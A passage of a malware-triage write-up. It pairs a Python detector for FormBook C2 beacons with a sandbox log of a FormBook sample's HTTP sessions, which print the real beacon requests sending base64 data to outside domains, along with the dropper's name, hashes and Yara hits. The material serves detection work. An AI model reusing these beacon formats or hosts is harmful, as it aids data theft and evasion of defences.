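        hits.append("spoofed_firefox27_mac_ua")
    if C2_PATH_RE.match(path):
        hits.append("short_single_segment_path")
    if hdr.get("connection") == "close" and hdr.get("cache-control") == "no-cache":
        hits.append("close_nocache_headers")
    if method == "POST":
        fields = split_form(body)
        if (hdr.get("content-type") == "application/x-www-form-urlencoded"
                and len(fields) == 1 and all(B64_RE.match(v) for v in fields.values())):
            hits.append("single_base64_form_field")
        # Origin/Referer are forged so the upload looks like a same-site form post.
        if (hdr.get("origin") == f"http://{host}"
                and hdr.get("referer") == f"http://{host}{path}"):
            hits.append("forged_same_site_origin_referer")
    elif method == "GET" and query:
        vals = list(split_form(query).values())
        if (len(vals) == 2 and any(B64_RE.match(v) for v in vals)
                and any(SHORT_ID_RE.match(v) for v in vals)):
            hits.append("base64_plus_short_id_query")
    return hits


def response_is_parking_page(raw: str) -> bool:
    """Replies in this capture are domain-parking pages, not a live C2:
    parking_session cookie, x-adblock-key header, window.park bootstrap."""
    _, hdr, body = parse_http(raw)
    return ("parking_session=" in hdr.get("set-cookie", "")
            or "x-adblock-key" in hdr or "window.park" in body)


def triage(sessions: list) -> list:
    """sessions: [(host, request_raw, response_raw)] -> one verdict dict per session."""
    out = []
    for host, req, resp in sessions:
        hits = request_indicators(req)
        beacon = len(hits) >= BEACON_THRESHOLD
        out.append({"host": host, "beacon": beacon, "indicators": hits,
                    "live_c2_candidate": beacon and not response_is_parking_page(resp)})
    return out


# Constructed records: request bodies from the capture, parking reply shortened.
POST_BEACON = (
    "POST /0sq9/ HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\nCache-Control: no-cache\r\nHost: www.deadshoy.tech\r\n"
    "Origin: http://www.deadshoy.tech\r\nReferer: http://www.deadshoy.tech/0sq9/\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\n\r\n"
    "QT=9BEMgTjmi+A69lQj1JD+uwY88dznZP7cfVqnbKsuYjgtViMivgq9j9B3adrHIOUO+0Y6Wj"
    "KOYKzhL4Zu+u6R73mnF4LQLviRkG26OnwEjuikvJrI1qS4D9iw+eWplVlrXbqS+h4Yd+L1gsl1l"
    "uEBUxie7iLuK8eBeHzRSuJpXCOFoAxvy8bFPi3M7VMj+fMtJQ==")
GET_BEACON = (
    "GET /yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5H"
    "Syz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4 HTTP/1.1\r\n"
    f"Connection: close\r\nHost: www.dnft.immo\r\nUser-Agent: {FORMBOOK_UA}\r\n\r\n")
BENIGN = ("GET /login?next=/home HTTP/1.1\r\nHost: intranet.example\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n\r\n")
PARKED = ("HTTP/1.1 200 OK\r\ncontent-type: text/html; charset=utf-8\r\n"
          "set-cookie: parking_session=c131e8e5-4845-4c8e-8a5f-a5f8baba5c30; path=/\r\n"
          "connection: close\r\n\r\n<!doctype html><script>window.park = \"eyJ1dWlk\"")
OK_PAGE = "HTTP/1.1 200 OK\r\ncontent-type: text/html\r\n\r\n<html>ok</html>"
SAMPLE_SESSIONS = [("www.deadshoy.tech", POST_BEACON, PARKED),
                   ("www.dnft.immo", GET_BEACON, PARKED),
                   ("intranet.example", BENIGN, OK_PAGE)]

if __name__ == "__main__":
    for verdict in triage(SAMPLE_SESSIONS):
        print(verdict)
```

Run it over an HTTP-stream export from the sandbox or a proxy log; a host that is flagged as a beacon and does not come back with a parking page is the one to pivot on, which in this capture is none of them. The splitter deliberately avoids URL decoding because the QT value is raw base64 and a library decoder would turn its '+' characters into spaces before the pattern is ever tested.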


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         16 | 192.168.11.20 | 49771 | 199.59.243.227 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Dec 10, 2024 18:49:33.085243940 CET | 443 | OUT | GET /0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.deadshoy.tech
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:49:33.220235109 CET | 1289 | IN | HTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:32 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1462
                                                        x-request-id: 8be0175d-6ab1-4c14-87ff-023e4edb07ba
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GxlRdSFQqcXELZHL5GFtQvyDcsNwpAytbwBdNTy7qtdpUXeYs0Fx/HHjF5dmkCw0HUyP1xz5shhRR4tdYpbK5A==
                                                        set-cookie: parking_session=8be0175d-6ab1-4c14-87ff-023e4edb07ba; expires=Tue, 10 Dec 2024 18:04:33 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 78 6c 52 64 53 46 51 71 63 58 45 4c 5a 48 4c 35 47 46 74 51 76 79 44 63 73 4e 77 70 41 79 74 62 77 42 64 4e 54 79 37 71 74 64 70 55 58 65 59 73 30 46 78 2f 48 48 6a 46 35 64 6d 6b 43 77 30 48 55 79 50 31 78 7a 35 73 68 68 52 52 34 74 64 59 70 62 4b 35 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GxlRdSFQqcXELZHL5GFtQvyDcsNwpAytbwBdNTy7qtdpUXeYs0Fx/HHjF5dmkCw0HUyP1xz5shhRR4tdYpbK5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:33.220467091 CET | 862 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGJlMDE3NWQtNmFiMS00YzE0LTg3ZmYtMDIzZTRlZGIwN2JhIiwicGFnZV90aW1lIjoxNzMzODUyOTczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVhZHNob3kudGVjaC8


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        17 | 192.168.11.20 | 49772 | 209.74.79.41 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 10, 2024 18:49:38.664721966 CET | 711 | OUT | POST /qp01/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.freshteps.life
                                                        Origin: http://www.freshteps.life
                                                        Referer: http://www.freshteps.life/qp01/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 55 4e 6d 6a 39 32 2b 57 61 34 7a 35 35 34 55 58 78 48 6a 6b 47 51 46 42 4c 62 7a 52 76 6b 56 33 72 32 61 7a 66 45 78 50 6c 56 6d 4b 41 2b 75 58 2f 79 50 37 71 69 62 47 4b 39 64 73 75 4a 71 68 6b 65 38 79 35 34 4f 49 7a 51 50 2b 5a 76 32 42 6d 55 58 75 74 45 4a 43 32 50 69 54 79 70 50 69 59 52 66 59 54 43 6f 4f 56 7a 79 48 79 4e 6c 6a 50 6c 42 6f 32 4a 51 46 35 72 6a 2f 50 6b 75 57 4c 78 68 54 76 63 7a 73 2f 49 49 43 76 33 31 78 52 49 33 70 6b 65 2f 58 48 72 77 42 31 56 62 4c 41 4b 54 72 6c 79 59 65 4b 54 67 39 76 6e 47 69 72 62 4b 6f 69 6a 63 4a 61 42 45 39 6c 34 7a 6a 45 67 3d 3d
                                                        Data Ascii: QT=UNmj92+Wa4z554UXxHjkGQFBLbzRvkV3r2azfExPlVmKA+uX/yP7qibGK9dsuJqhke8y54OIzQP+Zv2BmUXutEJC2PiTypPiYRfYTCoOVzyHyNljPlBo2JQF5rj/PkuWLxhTvczs/IICv31xRI3pke/XHrwB1VbLAKTrlyYeKTg9vnGirbKoijcJaBE9l4zjEg==
                                                        Dec 10, 2024 18:49:38.852972984 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:38 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        18 | 192.168.11.20 | 49773 | 209.74.79.41 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 10, 2024 18:49:41.366607904 CET | 731 | OUT | POST /qp01/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.freshteps.life
                                                        Origin: http://www.freshteps.life
                                                        Referer: http://www.freshteps.life/qp01/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 55 4e 6d 6a 39 32 2b 57 61 34 7a 35 37 5a 45 58 39 47 6a 6b 44 77 46 43 49 62 7a 52 6c 45 56 7a 72 32 57 7a 66 46 6b 43 6b 6d 43 4b 41 66 65 58 38 7a 50 37 76 69 62 47 53 4e 64 70 67 70 72 6a 6b 65 77 36 35 39 6d 49 7a 51 62 2b 5a 71 61 42 6c 69 66 74 76 55 4a 41 37 76 69 4e 74 35 50 69 59 52 66 59 54 47 42 72 56 7a 71 48 79 39 31 6a 4f 45 42 72 31 4a 51 43 75 62 6a 2f 65 55 75 53 4c 78 67 70 76 64 76 4b 2f 4c 67 43 76 79 78 78 53 5a 33 71 74 65 2f 4e 4b 4c 78 75 38 6c 79 43 49 36 32 58 6f 6c 70 4d 50 41 34 7a 75 78 4c 34 32 70 2b 4d 68 77 41 37 65 78 39 56 6e 36 79 34 5a 67 43 63 6f 39 5a 4d 34 34 4a 51 30 71 4c 79 43 72 58 45 6d 38 34 3d
                                                        Data Ascii: QT=UNmj92+Wa4z57ZEX9GjkDwFCIbzRlEVzr2WzfFkCkmCKAfeX8zP7vibGSNdpgprjkew659mIzQb+ZqaBliftvUJA7viNt5PiYRfYTGBrVzqHy91jOEBr1JQCubj/eUuSLxgpvdvK/LgCvyxxSZ3qte/NKLxu8lyCI62XolpMPA4zuxL42p+MhwA7ex9Vn6y4ZgCco9ZM44JQ0qLyCrXEm84=
                                                        Dec 10, 2024 18:49:41.539340019 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:41 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        19 | 192.168.11.20 | 49774 | 209.74.79.41 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 10, 2024 18:49:44.109718084 CET | 5156 | OUT | POST /qp01/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.freshteps.life
                                                        Origin: http://www.freshteps.life
                                                        Referer: http://www.freshteps.life/qp01/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 55 4e 6d 6a 39 32 2b 57 61 34 7a 35 37 5a 45 58 39 47 6a 6b 44 77 46 43 49 62 7a 52 6c 45 56 7a 72 32 57 7a 66 46 6b 43 6b 6d 4b 4b 41 74 47 58 2b 51 6e 37 6f 69 62 47 66 74 64 6f 67 70 71 37 6b 65 34 2b 35 39 71 79 7a 53 6a 2b 59 49 53 42 74 77 33 74 6c 55 4a 41 6e 66 69 51 79 70 4f 71 59 53 6e 63 54 43 6c 72 56 7a 71 48 79 34 78 6a 65 6c 42 72 7a 4a 51 46 35 72 6a 61 50 6b 75 36 4c 78 35 4c 76 63 61 78 34 36 41 43 76 53 42 78 65 50 6a 71 76 2b 2f 54 50 4c 78 32 38 6c 75 42 49 36 37 73 6f 6c 30 58 50 47 63 7a 76 47 79 44 6d 72 4b 4e 77 32 41 67 57 79 74 33 6c 73 75 70 48 51 65 45 70 63 78 33 77 49 55 44 2b 34 48 69 53 61 4c 76 38 5a 69 41 63 54 59 63 52 56 50 53 45 66 7a 70 63 76 6e 67 48 33 45 52 58 71 43 72 61 52 49 72 6a 76 77 54 35 69 46 7a 35 79 6c 7a 6c 39 6a 45 34 38 74 4b 73 68 74 37 64 6f 30 59 38 54 65 65 76 59 77 46 5a 36 76 48 32 54 77 76 75 57 58 59 34 79 63 34 69 5a 50 52 37 4e 63 30 73 54 69 67 4c 68 79 73 38 48 2f 49 4f 74 38 4d 46 7a 71 6d 4a 6f 64 6d 57 63 68 57 36 76 61 [TRUNCATED]
                                                        Data Ascii: QT= [TRUNCATED]
                                                        Dec 10, 2024 18:49:44.109740019 CET | 2724 | OUT | Data Raw: 67 70 30 70 48 55 46 4c 69 2f 50 6b 5a 4d 63 71 70 57 78 7a 65 39 49 52 71 34 6d 38 6f 46 68 55 48 65 59 33 35 35 69 66 69 5a 30 57 69 46 50 77 4f 66 2f 4a 35 47 50 76 45 41 33 51 66 6a 30 6b 6b 6e 6a 34 5a 52 39 4a 52 35 67 38 2f 57 31 42 4d 50
                                                        Data Ascii: gp0pHUFLi/PkZMcqpWxze9IRq4m8oFhUHeY355ifiZ0WiFPwOf/J5GPvEA3Qfj0kknj4ZR9JR5g8/W1BMPZ7eqDG5F+K/sW1STNjqZ308T6N4mO4/AziHLHx6HynGqB54ZPQkv6dlwbTVSQ+VvqKV5j3kL8veI4sqZOZk2FzOY8D5A3HwqIaOLLkqwIgAcCDRStWroqJ17VkNjlv/b2hpbaEz7epWuONXh8R53rMnWqFyrCQT0E
                                                        Dec 10, 2024 18:49:44.288527966 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:44 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        20 | 192.168.11.20 | 49775 | 209.74.79.41 | 80 | 7508 | C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Dec 10, 2024 18:49:46.840627909 CET | 444 | OUT | GET /qp01/?QT=ZPOD+BqQao/QyIxulVjbDCVFLb7RjhwyuULyKVNAiV+MeP7iuxHdlS3JdohyzquBitQvx+Sc1DnyV4OJvwDeoSt18py19YLRfjflEWoNZD6QwIJxPVF50MQ=&LLp=-2JPqdjXxxH4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.freshteps.life
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:49:47.014662027 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:46 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Target ID:0
                                                        Start time:12:47:42
                                                        Start date:10/12/2024
                                                        Path:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
                                                        Imagebase:0x490000
                                                        File size:1'179'648 bytes
                                                        MD5 hash:464587C795EFBA3D6A77D78AB9F3DE32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:12:47:43
                                                        Start date:10/12/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
                                                        Imagebase:0xdf0000
                                                        File size:47'016 bytes
                                                        MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:12:48:05
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe"
                                                        Imagebase:0x280000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
